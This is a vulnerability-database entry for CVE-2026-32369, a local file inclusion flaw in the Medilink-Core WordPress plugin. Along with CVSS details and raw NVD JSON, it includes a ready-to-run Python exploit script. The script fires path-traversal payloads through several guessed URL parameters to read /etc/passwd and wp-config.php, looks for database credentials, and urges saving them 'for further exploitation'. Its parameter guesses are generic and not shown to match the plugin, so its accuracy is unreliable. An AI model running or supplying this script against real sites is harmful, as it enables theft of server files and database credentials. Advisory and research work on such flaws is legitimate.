Security Vulnerability Report
中文
CVE-2026-32369 CVSS 7.5 HIGH

CVE-2026-32369

Published: 2026-03-13 19:54:51
Last Modified: 2026-04-22 21:30:26

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Medilink-Core medilink-core allows PHP Local File Inclusion.This issue affects Medilink-Core: from n/a through < 2.0.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Medilink-Core < 2.0.7
Medilink-Core from n/a through 2.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-32369 PoC - Medilink-Core Local File Inclusion # Target: WordPress site with Medilink-Core plugin < 2.0.7 import requests import sys def exploit_lfi(target_url, file_path='/etc/passwd'): """ Exploit Local File Inclusion vulnerability target_url: Base URL of the vulnerable WordPress site file_path: Local file to read (default: /etc/passwd) """ # Common vulnerable parameter patterns in WordPress plugins vulnerable_params = [ '?page=../../../../../../{}', '?action=include&file=../../../../../../{}', '?controller=../../../../../../{}', '?module=../../../../../../{}', '?include_file=../../../../../../{}', '?load=../../../../../../{}' ] for param_pattern in vulnerable_params: url = target_url + param_pattern.format(file_path) try: response = requests.get(url, timeout=10) if response.status_code == 200: print(f'[+] Potential LFI found at: {url}') print(f'[+] Response preview:') print(response.text[:500]) return True except requests.RequestException as e: print(f'[-] Error: {e}') return False def read_wp_config(target_url): """ Attempt to read WordPress configuration file """ wp_config_paths = [ '../../../../../../wp-config.php', '../../../../../../../wp-config.php', '../wp-config.php', '../../wp-config.php' ] for path in wp_config_paths: url = target_url + '?page=' + path try: response = requests.get(url, timeout=10) if 'DB_NAME' in response.text or 'DB_USER' in response.text: print(f'[+] wp-config.php content found!') return response.text except requests.RequestException: continue return None if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-32369.py <target_url>') print('Example: python cve-2026-32369.py http://example.com') sys.exit(1) target = sys.argv[1].rstrip('/') print(f'[*] Testing CVE-2026-32369 on {target}') # Test basic LFI exploit_lfi(target) # Try to read wp-config.php config = read_wp_config(target) if config: print('[+] Save config for further exploitation')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32369", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:51.220", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Medilink-Core medilink-core allows PHP Local File Inclusion.This issue affects Medilink-Core: from n/a through < 2.0.7."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP ('Inclusión Remota de Ficheros PHP') vulnerabilidad en RadiusTheme Medilink-Core medilink-core permite la Inclusión Local de Ficheros PHP. Este problema afecta a Medilink-Core: desde n/a hasta &lt; 2.0.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/medilink-core/vulnerability/wordpress-medilink-core-plugin-2-0-7-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}